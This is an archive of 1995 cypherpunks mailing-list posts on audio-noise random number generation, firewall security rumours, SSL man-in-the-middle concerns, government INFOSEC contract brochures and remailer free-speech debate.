/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/Ex
UP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8D
i31MRmypd


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Mon, 2 Oct 95 18:49:44 PDT
To: cypherpunks@toad.com
Subject: Re: One-Time-Pad generation from audio device
Message-ID: <199510030146.VAA09247@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date:	Mon, 2 Oct 1995 16:42:04 +0100 (BST)
>From:	"Rev. Mark Grant" <mark@unicorn.com>
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>Subject:	One-Time-Pad generation from audio device
>
>
>Over the weekend I hacked up a one-time-pad generator from
> the random 
>number code I've been writing for Privtool, which uses noise
> from the 
>audio device to generate random numbers.
>
>The code basically reads in a 512-byte block from
> /dev/audio, then takes
>the MD5 of that block to generate 16 bytes of the OTP. The
> raw audio data
>I'm getting is not particularly random and will compress by
> 3:1 using gzip
>or compress, so I'm assuming that using a 32:1 ratio here
> via MD5 will
>give a truly random output (it's certainly uncompressible).
>
>Before I release the source code to the Net, can anyone give
> me any good
>reasons to believe that this won't produce physically random
> output, or
>make suggestions on how to test, or improve, the generated
> output ? There's
>a #define which can be used to easily increase the amount of
> data fed into
>the MD5, but at the moment it will only generate about 1 MB
> per hour on a
>Sparcstation (limited by the audio input rate), so I don't
> want to
>increase that if I don't have to. 
>
>	Mark

There are many ways to test for randomness. you might want to 
start by accumulating instance of "1" and "0" and over a long 
time you should have roughly an equal number of both.  If you 
have access to a spectrum analyzer with an auto-correlation 
function (or cross-correlation will do) feed in similar 
lengths of output at different time intervals and check to 
ensure a low (close to zero) correlation exists.  Also while 
you are at it you might want to checks the ouput's frequency 
spectrum, it should be fairly uniform accross the generating 
range.  Noise (or randomness) which is not normally 
distributed can lead to nasty hacks.

Be Well!!
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Mon, 2 Oct 95 21:55:48 PDT
To: sameer@c2.org
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <9510030455.AA11218@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Community Connexion, an Internet service provider that last week
>  promised a free T-shirt to anyone who found a flaw in Netscape
>  Communications Corp.'s software, extended the challenge Friday to
>  include holes in Microsoft products.
.......................................

So what message will the T-shirts have on the front, Sameer?

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Mackintosh <glenn@border.com>
Date: Mon, 2 Oct 95 19:03:51 PDT
To: todd@lgt.com (Todd Glassey)
Subject: Re: Information, We want information
Message-ID: <95Oct2.221648edt.4998@janus.border.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: todd@lgt.com (Todd Glassey)

> I an immediate need of info on the liabilities of BSD type systems, and in
> particular the BorderWare products.
>
> I heard that in the BorderWare product itself, there are several recently
> discovered potential "holes"...
>
> I have a particular interest in both the Attack MO against the BSD
> platforms in general and the Border products in particular...
>
> Please do not send the reply to the lists but to me personally
> (todd@lgt.com). I will summarize if I get enough info to be worth the
> effort.
>
> Any comments?

Let me make a very clear statement. No site protected by BorderWare has
ever had its Firewall penetrated. Never. 

This is the second time I've heard rumors about insecurities in the
BorderWare software with nothing being brought out to substantiate them.  I
guess this is just an unfortunate part of doing business - especially in the
security domain.  I get a bit annoyed by this kind of thing since,
regardless of whether we refute such comments, after the discussion itself
is forgotten people will often remember that they heard something about a
problem with product X. This isn't a criticism of you Todd - you are just
reporting that you've heard rumors and asking about them, which is a
perfectly reasonable thing to do. 

Obviously the rumors you heard haven't come along with any facts since
you're asking here for the "Attack MO".  I would very much like to here about
any problem that is real, since if there were any weaknesses we would want
to fix them and disseminate the fix as fast as possible. 

Border takes any potential problem very seriously.  A couple of months ago
there was a potential weakness that was discovered in the process of
Border's ongoing efforts to ensure the security of the product.  It was only
a security risk with a very specific configuration.  No customer has ever
reported seeing this. Within two days of this discovery we had a fix and
the fix was being actively pushed through the distribution channels to the
customer base. It was given high priority and we had our support people
calling down to the reseller channels to ensure that they were aware and
that they got it out to their clients.  We intended to make sure that this
potential problem was immediately removed from the firewall even though no
one had actually reported a problem.

The fix was given free of charge to anyone whether they had a support
contract or not.  Some customers were even upgraded to a newer version of
BorderWare so they could receive the fix.  We strongly believe that our
customers are entitled to the best available protection.  They bought a
Firewall for security and they should expect it to be secure.  Border will
do everything that we can to ensure this is always the case.  So, anyone out
there if you believe you have some real attack mechanism we want to know.

Now that you've sat through the general ranting part of my comments, let me
try to answer the BSD specific part.  As far as BSD based OS's in general I
don't think there is reason to believe that they are any more or less secure
than System V based Unix's (or other non-Unix based operating systems for
that matter).  They all have pro's and con's and they have all had problems
and I don't think that one variant has had more problems historically than
the other. That said, Border doesn't use a stock BSD based OS anyway.  We
have put a large amount of effort into "hardening" the kernel so that it is
a solid base upon which to build a secure firewall.

We don't believe that any stock OS which was designed for a dynamic
environment with users on it will really be secure.  There are far too many
instances (with just about any OS, Unix or otherwise) where someone has
gained privilege or increased access to a system by taking advantage of some
feature once they managed to get on the box.  A firewall should be a static,
non-user environment which means that many features are just not required
and can be removed or their behavior significantly changed and limited. We
spent a considerable amount of manpower stripping down the kernel and
leaving only what was really needed.  We removed the mechanisms which can be
used to gain privilege or increase the levels of access to the system. The
BorderWare kernel is in fact one of its strongest assets, and not a
potential weakness.


Glenn Mackintosh
V.P. Technology
------------------------------------------------------------------------
Border Network Technologies Inc.                 Email: glenn@border.com
20 Toronto Street, Suite 400,                    Tel: +1 416 368 7157
Toronto, Ontario, Canada, M5C 2B8                Fax: +1 416 368 7789




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Mon, 2 Oct 95 19:12:23 PDT
To: cypherpunks@toad.com
Subject: SAIC Ideas SCI
Message-ID: <199510030212.WAA01489@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://baretta.ideas.com/capabilities
    

   SAIC Ideas Group

   7120 Columbia Gateway Dr.
   Columbia, MD 21046-2115
   (410) 312-2000 Fax:(410) 312-2250
   Contact: Bill Howard (410) 312-2060 wjh@ideas.com
   
   [Snip]

   1.2 SAIC acquired the government sectors of IDEAS, Inc. in 
November
   1994. Now known as the SAIC Ideas Group, this business area
   encompasses 230 technical people (165 SCI cleared) located 
in a
   company owned 100,000 Sq. Ft. Columbia, Maryland facility.
   
   [Snip]

   2. TECHNICAL SKILLS
   
   The SCI cleared skills mix for the SAIC Ideas Group is 
listed in the 
   table below. Table 1: Ideas Group SCI Cleared Skills Mix 
(7/95)
   
   Skill Category SCI Cleared Staff

   Project Management 8
   Software Engineering 48
   Hardware Engineering 10
   Hardware Technician 14
   Test Engineering 24
   ILS 12
   Training 12
   Systems Engineers 28
   Administrative 9
   
   3. COLUMBIA, MD FACILITIES
    
   The SAIC, Ideas Group, 100,000 square foot building is 
located at 7120
   Columbia Gateway Drive, Columbia, MD. This facility offers 
"one-stop
   shopping" for your system and hardware needs.
   
   [Snip]       
   
   3.2 Sensitive Compartmented Information Facility (SCIF) 
features:
   
   13,000 square foot certified SCIF
   Secure conference areas
   Secure office spaces
   Project rooms
   Raised floor staging areas
   Two large shielded rooms
   Class A storage vault
   Secure STU-III telephone
   Secure Facsimile
       
   The largest SCIF conference room will support approximately 
65-75
   people; smaller conference rooms are available. Secure 
staging areas
   have self-contained environmental control and AC wiring for 
single or
   three phase, 50 or 60 Hz, power. The staging areas also 
provide
   separate digital and analog ground radials referenced to a
   single-point independent earth ground to effectively emulate 
most
   customer locations. Several SCIF areas can be arranged to 
provide
   secure space -- screened if necessary. Systems with 200 
racks of
   equipment have been staged and operated in the Ideas Group 
SCIF.
   
   [Long snip]

   
_________________________________________________________________

   
   webmaster@ideas.com // (c) Copyright 1995 by Science 
Application
   International Corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 2 Oct 95 14:27:40 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.OSF.3.91j.951002141954.21670A-100000@saul1.u.washington.edu>
Message-ID: <Pine.3.89.9510022206.A14466-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Oct 1995, Yih-Chun Hu wrote:

> I wouldn't bet on it. I did a similar hack with perl, with a much more
> conservative 5 seconds to 32 bytes. That didn't cut it, when I ent'ed the
> result it gave 6 bits of entropy / 8 bits of output.

How did you measure the entropy of the output ?

> Um.. I would try to generate bits quickly, then securely, so for example
> you get a 2k buffer and do it 5 sec / 128 bits. Then slow down and overwrite
> the buffer and give warnings if the user wants to use the bits too early.

Ah, well the idea is that they can just generate a OTP when they have a 
few spare hours, not that they'd be generating it in real-time. The 
Privtool code does use realtime generation of random numbers, but it has 
a lot of input data other than the audio (e.g. mouse movements, MD5 
hashes, etc).

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Mon, 2 Oct 95 19:34:19 PDT
To: cypherpunks@toad.com
Subject: SAIC Snags INFOSEC
Message-ID: <199510030234.WAA02732@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.disa.mil/ciss/itsc/docs/brochure.html


   INFOSEC Technical Services Contract The Solution to Your 
Security
   Needs Now!
   
   What is INFOSEC
   
   Information Systems Security (INFOSEC) is defined as the 
protection of
   information systems against unauthorized access to or 
modification of
   information, whether in storage, processing or transit, and 
against
   the denial of service to authorized users or the provision 
of service
   to unauthorized user's, including those measures necessary 
to detect,
   document, and counter such threats. For operations and for 
economic
   efficiencies INFOSEC is an enabling feature. It is the 
discipline that
   protects the integrity, availability, and confidentiality of 
our
   information assets and systems. All information is important 
and
   valuable to its users and requires some level of protection 
from
   unauthorized disclosure (confidentiality), assured access by 
users
   (availability), and protection from unauthorized change 
(integrity).
   We believe that good security is a mission enhancer, not a 
mission
   detractor! Our overall approach to information systems is 
security is
   to PROTECT information using a layered defense based on risk
   management and cost benefit analysis. We must be able to 
monitor all
   our systems and networks in real time to DETECT intrusions 
or hostile
   actions at all levels, and then REACT to isolate the 
systems, correct
   the security breach, restore service to the users, and act 
to prevent
   future attempts.
   
   Center for Information Systems Security
   
   Background
   
   In July 1990, the Assistant Secretary of Defense for 
Command, Control,
   Communications, and Intelligence ASD(C3I), started an 
investigation
   effort for coordinated DOD-level management of defense 
INFOSEC
   initiatives. DCA, now DISA, was designated as the lead 
agency with
   assistance from the National Security Agency (NSA). A 
DISA/Center for
   Information Systems Security (CISS) and NSA plan was 
developed and
   approved for establishment of the Defense Information 
Systems Security
   Program (DISSP).
   
   CISS has its origin in the Defense Information Systems 
Security
   Program (DISSP), a joint DISA/NSA program. Continuing as a 
joint
   program office CISS's mission is to manage, coordinate and 
provide
   direct INFOSEC application support to DOD programs, develop 
standards
   and protocols for INFOSEC and expedite the implementation of 
MLS
   command, control and communications systems for DOD. The 
CISS provides
   a means to fully review, coordinate, and make 
recommendations
   concerning the implementation of policy, architecture, and 
products to
   support DOD objectives.
   
   Mission
   
   The Center for Information Systems Security (CISS) is a 
joint DISA/NSA
   organization charged with executing the centrally managed 
Defensive
   Information Warfare (IW-D) and INFOSEC functions within DOD.
   
   CISS is the focal point for assuring availability, 
integrity, and
   confidentiality of all DII systems and information. We 
provide direct
   support to DOD services and agencies, and define 
requirements for DII
   INFOSEC standards. Additionally, CISS provides central 
coordination
   and reporting response to all DOD INFOSEC incidents, and 
operational
   protection, detection, reaction, and vulnerability analysis 
to the
   DII.
   
   What is the INFOSEC Technical Services Contract?
   
   DISA awarded the INFOSEC Technical Services Contract 
(INFOSEC TSC) on
   12 July 1995 to two large businesses (CSC and SAIC) and one 
small
   business (MERDAN Group, Inc.). CISS, a joint DISA/National 
Security
   Agency (NSA) program, has been chartered to provide INFOSEC 
services
   throughout DoD. INFOSEC support will be provided by CISS
   infrastructure resources with contractual assistance from 
the INFOSEC
   TSC. The primary responsibility of the joint program office 
is to
   assure the effective and coherent application of INFOSEC to 
the
   overall Defense Information Infrastructure (DII).
   
   The contract offers technical support in the areas of:
   
     * INFOSEC Security Policy
     * INFOSEC Requirements Support
     * INFOSEC Architecture and Engineering
     * INFOSEC Independent Validation and Applications 
Verifications
     * INFOSEC Products and Applications DoD Goal Security 
Architecture
       (DGSA)
     * INFOSEC Certification and Accreditation Master 
Transition Plan
     * INFOSEC Technology and Training Documentation, and 
Countermeasures
       Information Dissemination
     * INFOSEC Multilevel Security Technology
     * INFOSEC Technical Managemet and Capabilities Planning 
(TMP)
     * INFOSEC ProfessionalizationProgram and Project 
Management
     * INFOSEC Standards and Protocols
       
   The contract is not a Federal Information Processing (FIP) 
hardware or
   software procurement contract.
   
   All DOD departments and agencies requiring INFOSEC services 
can
   utilize the INFOSEC TSC. The contracts are Indefinite 
Delivery,
   Indefinite Quantity (IDIQ) with individual firm fixed price, 
cost plus
   fixed fee, and time and material Delivery Orders (DOs) 
awarded for
   each requirement. Ceiling on the INFOSEC TSC is $1.095B 
which includes
   authority for other Federal (non-DOD) Agency use of 10% of 
current
   contract value. An additional 10% authority for non-DOD 
federal
   agencies is anticipated from GSA. There will be a 2 percent 
fee
   applied to all Delivery Orders.
   
   Details for submitting requirements are spelled out in the 
"Guide for
   the INFOSEC TSC.
   
   
   Advantages of Using the INFOSEC Technical Services Contract
   
     * Provides contractual assistance in support of INFOSEC 
and INFOWAR
       requirements
     * Provides a means to obtain assistance in addressing 
complex
       systems security issues
     * Provides a high level of expertise to support systems
       certification and accreditation
     * Provides necessary DII/NII security support for DII/NII 
open
       systems architecture
     * Provides hardware and software support for INFOSEC 
prototyping and
       incidental hardware/software required to perform the 
task
       
     
_________________________________________________________________

   
   
   The INFOSEC TSC guide can be obtained from the:
   
   INFOSEC Technical Support Office (ITSO)
   Center for Information Systems Security
   5111 Leesburg Pike, Suite 100
   Falls Church, VA 22041-3201
   
   Attention: Ms. Nanette Chopin
   (703) 681-1331
   ---or---
   Attention: Mr. James Lindou
   (703) 681-1333
   FAX (703)681-1393
   ---or---
   through the World Wide Web at 
http://www.disa.mil/ciss/itso.html.
   
     
_________________________________________________________________

   
   
   SAIC Team Members
   
     * Bell Atlantic
     * Bellcore
     * CTA, Inc.
     * George Mason University
     * Information Security Systems, Inc.
     * JANUS Associates
     * Lockheed Martin
     * MICON Services Company
     * Pailen-Johnson Associates, Inc.
     * Secure Solutions, Inc.
     * Sprint
     * Technautics, Inc.
     * TeleCommunication Systems (TCS)
     * TELOS


   CSC Team Members
   
     * A.B. Floyd
     * Automation Research Systems (ARS), Ltd.
     * Bowie State
     * Computer Associates
     * DEC
     * DMR Group
     * Group Technologies
     * Intermetrics
     * IRE
     * Metters Industry
     * MIS Training Institute
     * Northrop Grumman
     * ORA
     * Oracle
     * RSSI
     * Space Applications Corporation
     * Systems Engineering Solutions, Inc.
     * Sparta
     * Spyrus
     * SRA
     * TASC
     * USATREX
     * Xerox
   
   
   Merdan Group, Inc. Team Members
   
     * Advanced Data Concepts, Inc.
     * Management Technology Strategic Association, Ltd.
       
     
_________________________________________________________________

   
   
   For More Information Contact the INFOSEC Technical Support 
Office
   
   Ms. Nanette Chopin, COR/DPM
   Voice: (703) 681-1331
   Fax: (703) 681-1393
   E-Mail to Ms. Nanette Chopin 
   
   
   Mr. Jim Lindou, ACOR/PM
   Voice: (703) 681-1333
   Fax: (703) 681-1393
   E-Mail to Mr. Jim Lindou 
   
   
   Defense Information Systems Agency
   5111 Leesburg Pike, Suite 100
   Falls Church, Virginia 22041
   
     
_________________________________________________________________

   
    Return to:
    
    CISS TSC Home Page
   DISA CISS Home Page
   DISA Home Page

     
_________________________________________________________________

   
   
   You can mail any questions about these documents to:
   
   Ms. Nanette Chopin 
   
   
   You can mail any questions about the DISA server to:
   
   yorkw@ncr.disa.mil - Last revision: 16 August 1995 
   okonw@ncr.disa.mil
   
   
     
_________________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 2 Oct 95 20:24:46 PDT
To: cypherpunks@toad.com
Subject: RNG's and time-stamps
Message-ID: <199510030340.WAA06046@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Now that is an idea, exploit the dynamic nature of Internet. Us the
difference in times between the stamp and when the mail arrives to generate
a RNG.

Just a thought.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 14:49:09 PDT
To: trei@process.com
Subject: Re: List latency.
In-Reply-To: <9510021744.AA01741@toad.com>
Message-ID: <9510022148.AA06696@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:
[...]
 > It looks like there's a considerable delay entering and leaving uunet. I'm not sure which
 > machine gets the blame, but it's either toad&uunet, or uunet&alcor.

sending mail to myself (not going through list processing),
via toad.com, It took 32 seconds for my host to find, contact and send
the mail to toad.com, then it took more than 5 minutes for it to come
back, and specially it came back as :

Received: from relay3.UU.NET by hplyot.obspm.fr with SMTP
	(1.36.108.10/16.2.5) id AA05486; Mon, 2 Oct 1995 19:48:39 +0100
Return-Path: <dl@hplyot.obspm.fr>
Received: from toad.com by relay3.UU.NET with SMTP
	id QQzjtb16149; Mon, 2 Oct 1995 14:47:28 -0400
Received: from hplyot.obspm.fr by toad.com id AA02554; Mon, 2 Oct 95
11:42:59 PDT
Received: by hplyot.obspm.fr
	(1.36.108.10/16.2.5) id AA05454; Mon, 2 Oct 1995 19:42:31 +0100

So the question now is :
 "Why the toad.com send its mail through *.uu.net instead of sending
  it directly ?"

[it would/should cut at least by half the delay {at the coast of more
DNS traffic for toad.com}]

Also I suspect the long delays we sometime see comes from
toad<->uu.net interactions [besides the normal overhead of sending one
mail to thousands of people]

(the service is great anyhow)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Chirac Panama Peking Serbian Treasury smuggle Saddam Hussein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 14:55:45 PDT
To: Weld Pond <weld@l0pht.com>
Subject: `NOISE' what crypto is that ? [was Re: NT and C2]
In-Reply-To: <Pine.BSD/.3.91.951002132703.28404A-100000@l0pht.com>
Message-ID: <9510022154.AA06732@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Weld Pond writes:
[...]
 > http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/ExUP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31MRmypd
 >
What kind of (en)coding is that ? some kind of rot13++ ?


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom mururoa explosion NSA cryptographic NORAD Treasury




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 2 Oct 95 22:55:17 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510030445.AAA29715@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Oct 1995, Perry E. Metzger wrote:
> 
> Radio signals can be interfered with or listened to -- never
> underestimate the opponent. Computer interfaced radiation detectors,
> in spite of Tim's claim to the contrary, are pretty cheap and very
> hard to interfere with.

What about a beam of high intensity ionising radiation aimed at the 
detector? Since we're dealing with lo intensity sources, this could force
the RNG into a small part of its range. Beware of black helicopters 
carrying cyclotrons :-)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 2 Oct 95 23:02:32 PDT
To: cypherpunks@toad.com
Subject: Re: Introducing Johnson-Grace
In-Reply-To: <95Oct2.185011pdt.21953@mail.jgc.com>
Message-ID: <199510030602.XAA18317@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In an unsolicited advertisement,
Publisher Program <TechSupport@jgc.com> writes:

 > You may have never heard of Johnson-Grace Company, but you
 > have probably seen the benefits of our image compression
 > technology in America Online and Apple's eWorld.

Two painfully slow online services.

 > In fact, ART formatted images transmit three times faster
 > over conventional telephone lines than old-style GIFs and
 > JPEGs.

This might very well be true for a restricted set of images, but
I seriously doubt that arbitrary color photographic images take
three times less space with this system than with JPEG given
comparable retention of detail.

Also, are we suggesting that images transmit exactly three times
faster as both GIF and JPEG.  This is somewhat odd, given that
the difference in size between the two latter formats is often a
factor of ten? If you can beat JPEG by a factor of three, you can
beat GIF by about a factor of 30.

If you really can do this, you should be working on MPEG-4, and
not spamming our nice little list with advertising material.  I
should point out that neither Fractals, Lapped transforms, or
Wavelets can beat JPEG by a factor of three, and neither, I
suspect, can you.

[Huge Self-Promotion and Wonders of the Product Elided]

 > For example, our proprietary Splash(TM) feature displays a
 > full-size image in roughly one second; the image then
 > becomes sharper as more detail is received and decompressed
 > in additional layers, producing a high-quality final image
 > within seconds.

JPEG can do this quite easily with either the progressive or
hierarchical modes of transmission.  Why reinvent the wheel?

The engineering graveyard is littered with the bodies of various
entities who announced spectacular image compression advances. In
each case, reality dawned shortly after the hype died down.

 > Additionally, Johnson-Grace is in discussions with all the
 > other major Web browser companies to include ART technology
 > in their products. We expect broad support by the end of the
 > year.

Translation: We've learned how to use the "associate" command in
WinDoze File Manager.

 > For example, later this year you'll see news of ART speech
 > compression technology that will enable publishers to author
 > interleaved sound and images for real-time playback at
 > 14,400 bits per second.

It's been done.  Do the words "low bandwidth videoconferencing"
ring a bell?  I'll be truely surprised if you can beat
PictureTel's complex proprietary algorithm for sound and image
compression.

[Silly Form Deleted]

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Mon, 2 Oct 95 23:22:34 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030606.AA09386@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



> From cmcmanis@scndprsn Mon Oct  2 09:07:33 1995

> Why forge it? Why not simply buy a netsite server with a valid certificate.
> Let's say you paid full list for it $5000. It is the classic MITM attack
> but the protection against that attack was generally that the parties
> communicating "knew" each other. 

Of course, the attacker would be leaving a very strong pointer back to 
themselves as evidence.


> This is a fundamental weakness of putting the security at the SSL level as
> opposed to a possibly higher level. With the netscape attack since your
> client never cares "how" (or to whom) the SSL connection is made, it never
> shows you the information about where the source key came from. Only that
> it is valid.

I'm not sure this is really an issue of where the security is layered, 
but rather a flaw in the use of it, in not requiring the unambiguous 
specification of the "service name" (what's in the certificate) beforehand, 
or confirming it after the connection is established.  

You must have a binding between the target URL and the desired "service name", 
regardless of whether you have the security protocol in the session layer (SSL) 
or the application/http layer (Secure-HTTP).


- Don





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 2 Oct 95 20:06:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <199510030135.VAA17223@mail-e1a.megaweb.com>
Message-ID: <199510030306.XAA24030@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


MIGUEL DIAZ writes:
> I don't know about everyone else, but a T-shirt seems a very 
> small reward for uncovering a "hole" in the encryption 
> algorithm of Microsoft products.  

I don't know about anyone else, but helping to protect the confidential data 
of millions of users around the world seems a very large reward for
uncovering a hole in the encryption algorithms of M$ products.

Clearly, YMMV.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 2 Oct 95 20:09:41 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Certificate proposal & X509 clarifications
Message-ID: <9510030308.AA10671@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>  Therefore, you
>have to get someone owning an OBJID tree branch to define meanings for you
>- -- and you have to publish some worldwide book of mappings, etc.

While I am no big fan of OID's (and I really dislike ASN.1 -- and nobody
ever explained to my why the ISO RPC standard doesn't use it), if
anybody really needs an ISO OID tree, I will probably be willing to
tear off a piece of OSF's:
	1.3.22
	{ iso(1) identified-org(3) osf(22) }




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 2 Oct 95 20:14:02 PDT
To: cypherpunks@toad.com
Subject: Re: Time Lag
Message-ID: <9510030313.AA10680@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Internet email is highly dynamic.  Hosts can be up/down.  Routers can
be up/down.  Gateways can be up/down.  Routing databases can be out of
date.  Cables can be cut.  Load averages can affect whether a host accepts
SMTP connections.  And so on.

Sending one message and rigorously studying timestamps in the Received
lines and using that to draw conclusions about mail propagation is a
complete waste of time.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 3 Oct 95 00:00:30 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape'sdependence upon RSA down for the count!)
Message-ID: <v02120d02ac969ce0cf99@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



The idea here is to use multiple alternative channels for distributing
the checksums (newsgroups, mailing lists, telephone support lines,
fax-back service, e-mail, etc.), in addition to the ftp sites.

Also, since you guys use (relatively untrusted) mirror sites, you can
distribute the checksums on your official sites, so that people can
verify them from you directly, even if it's more practical for their
main download to be from a "local" mirror.

>
>  I've been thinking about this recently for obvious reasons.  My concern
>is that if someone can attack your download of netscape, they could also
>attack your download of the program that validates netscape.  Is there
>really any way out of this one?
>
>        --Jeff






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Mon, 2 Oct 95 21:16:18 PDT
To: cypherpunks@toad.com
Subject: Re: The Free Speech Implications of Remailers
Message-ID: <9510030417.AA14938@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 10/1/95 -0700, Tim May wrote:
<snip>
>Well, guess what? The very technologies we have been so central in
>deploying are the technologies that make _conventional_ means of
>controlling distasteful material so hard.
>system of the various mail delivery systems.)
<snip>
>Crypto anarchy means the racists, sexists, speciesists, and other "ists"
>cannot be muzzled. I call this a good thing. It's why I'm here.


   Excellent analysis.  One can't argue with logic, nor should one forget
the purpose and spirit of this list.
   The fact that spamming is in poor taste is irrefutable.  However, some of
the "where did this come from"? responses are starting to sound like some
people are suddenly against the use of anonymous remailers.  I, for one,
would hope that people are simply rising to the challenge of tracing the
routers.
   Kill the message if you are so moved -- not the technological messenger.
  



********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ironwolf@Minotaur.com (Robert McNally)
Date: Mon, 2 Oct 95 22:22:26 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <v01530500ac919ccd39d8@[198.81.209.45]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Recently Peter Trei <trei@process.com> called for new names and slogans to
replace the negatively loaded name "Cypherpunks." Here is one effort
(partially based on his suggestion, but with refinements.) Note that I
intend the term "strong privacy" to include both cryptography-based tools,
and other tools such as remailers. I hereby place the following into the
public domain.

* * *

I lock my car.
I secure my house.
I send my letters in envelopes.
I store my valuables in safe places.
I don't let strangers hold my wallet.
I don't wear a name tag everywhere I go.
I carry my cash and credit cards out of sight.
I don't show off my key number when visiting the ATM.

I protect my e-mail and files with strong privacy tools.

Don't you?


A message from SPAN: the Strong Privacy Advocates Network

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGvwfwsQtf7CdTI1AQFSGwP9HWusresWaRsQig2fSNW/nXt+oKVv6Np7
5EuziM3v1ihP4Clr4dqUtEE+Yujf7o71I7nb1UrVvwpIOt5yWXtiZc2/5VPZFBUY
bTUHlQ/NkgKum9RMnntb8BprtpiTSrb+o2s9iYDJLfFnCeT8n2zEn97GgandKA2o
rbXWVIEKSpc=
